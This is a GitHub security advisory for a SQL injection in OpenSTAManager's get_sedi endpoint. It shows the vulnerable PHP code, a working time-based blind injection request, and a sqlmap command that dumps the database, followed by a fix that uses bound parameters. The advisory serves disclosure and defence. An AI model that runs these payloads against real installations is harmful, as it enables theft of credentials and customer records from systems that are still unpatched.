GHSA-w995-ff8h-rppg

Published: 3 Feb 2026
Source: github
GitHub: reviewed
CVSS4: 8.7

Description

OpenSTAManager has a SQL Injection in ajax_complete.php (get_sedi endpoint)

Summary

A SQL Injection vulnerability exists in the ajax_complete.php endpoint when handling the get_sedi operation. An authenticated attacker can inject malicious SQL code through the idanagrafica parameter, leading to unauthorized database access.

Proof of Concept

Vulnerable Code

File: modules/anagrafiche/ajax/complete.php:28

```php
case 'get_sedi':
    $idanagrafica = get('idanagrafica');
    // user-controlled value concatenated straight into the SQL text
    $q = "SELECT id, CONCAT_WS( ' - ', nomesede, citta ) AS descrizione FROM an_sedi WHERE idanagrafica='".$idanagrafica."' ...";
    $rs = $dbo->fetchArray($q);
```

Data Flow

  1. Source: $_GET['idanagrafica'] → get('idanagrafica')
  2. Vulnerable: user input is concatenated directly into the SQL query inside single quotes
  3. Sink: $dbo->fetchArray($q) executes the resulting query

Exploit

Manual PoC (time-based blind SQLi):

```http
GET /ajax_complete.php?op=get_sedi&idanagrafica=1' AND (SELECT 1 FROM (SELECT(SLEEP(5)))a) AND '1'='1 HTTP/1.1
Host: localhost:8081
Cookie: PHPSESSID=<valid-session>
```

SQLMap Exploitation:

```
sqlmap -u "http://localhost:8081/ajax_complete.php?op=get_sedi&idanagrafica=1*" \
  --cookie="PHPSESSID=<session>" \
  --dbms=MySQL \
  --technique=T \
  --level=3 \
  --dump
```

SQLMap Output:

```
[INFO] URI parameter '#1*' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
Parameter: #1* (URI)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: idanagrafica=1' AND (SELECT 2572 FROM (SELECT(SLEEP(5)))oOnc)-- rhVF
back-end DBMS: MySQL >= 5.0.12
```

Impact

  • Data Exfiltration: Complete database extraction including user credentials, customer data, financial records
  • Privilege Escalation: Modification of zz_users table to gain admin access
  • Data Integrity: Unauthorized modification or deletion of records
  • Potential RCE: Via SELECT ... INTO OUTFILE if file permissions allow

Affected Versions

  • OpenSTAManager: Verified in latest version (as of December 2025)
  • All versions using this endpoint are likely affected

Remediation

Replace direct concatenation with prepared statements:

Before:

```php
$idanagrafica = get('idanagrafica');
$q = "SELECT ... WHERE idanagrafica='".$idanagrafica."' ...";
```

After:

```php
$idanagrafica = get('idanagrafica');
$q = "SELECT ... WHERE idanagrafica=".prepare($idanagrafica)." ...";
```
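The fix above relies on the project's own prepare() helper. As an added example (not OpenSTAManager code), the same get_sedi lookup written with PDO bound parameters plus an integer check on idanagrafica, which is a numeric foreign key; it runs stand-alone against a constructed in-memory SQLite table, so the MySQL CONCAT_WS is replaced by SQLite's || operator:

```php
<?php
// Added example, not part of OpenSTAManager. Hardened get_sedi handler:
// validate the id as an integer, then bind it instead of concatenating.

function getSediSafe(PDO $dbo, string $rawId): array {
    // idanagrafica is a numeric key: refuse anything that is not a plain
    // non-negative integer before it gets anywhere near the SQL text.
    if (!ctype_digit($rawId)) {
        throw new InvalidArgumentException('idanagrafica must be an integer');
    }
    $idanagrafica = (int) $rawId;

    // Placeholder instead of string concatenation: the value travels
    // separately from the statement, so quotes in input stay data.
    $stmt = $dbo->prepare(
        "SELECT id, (nomesede || ' - ' || citta) AS descrizione
           FROM an_sedi WHERE idanagrafica = :id"
    );
    $stmt->bindValue(':id', $idanagrafica, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Constructed sample data (assumed schema, only the columns the query uses).
$dbo = new PDO('sqlite::memory:');
$dbo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$dbo->exec("CREATE TABLE an_sedi (id INTEGER PRIMARY KEY, idanagrafica INTEGER, nomesede TEXT, citta TEXT)");
$dbo->exec("INSERT INTO an_sedi VALUES (1, 1, 'Sede legale', 'Milano'), (2, 1, 'Magazzino', 'Torino'), (3, 2, 'Ufficio', 'Roma')");

// Legitimate lookup: only the two branches belonging to customer 1.
print_r(getSediSafe($dbo, '1'));

// The advisory's payload shape never reaches the database: it fails the
// integer check, so there is no SLEEP delay and no cross-customer data.
try {
    getSediSafe($dbo, "1' AND (SELECT 1 FROM (SELECT(SLEEP(5)))a) AND '1'='1");
} catch (InvalidArgumentException $e) {
    echo "rejected: {$e->getMessage()}\n";
}
```

Even without the ctype_digit check the bound parameter alone closes the injection; the check is there so that a malformed id is logged as a rejected request rather than silently returning an empty result.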

Credit

Discovered by: Łukasz Rybak

Packages

Name: devcode-it/openstamanager (composer)
Affected versions: <= 2.9.8
Patched version: none

EPSS

Percentile: 8%
Score: 0.0003
Low

CVSS4: 8.7 High

Weaknesses

CWE-89

Related vulnerabilities

nvd
3 days ago

OpenSTAManager is an open source management software for technical assistance and invoicing. In version 2.9.8 and prior, a SQL Injection vulnerability exists in the ajax_complete.php endpoint when handling the get_sedi operation. An authenticated attacker can inject malicious SQL code through the idanagrafica parameter, leading to unauthorized database access. At time of publication, no known patch exists.
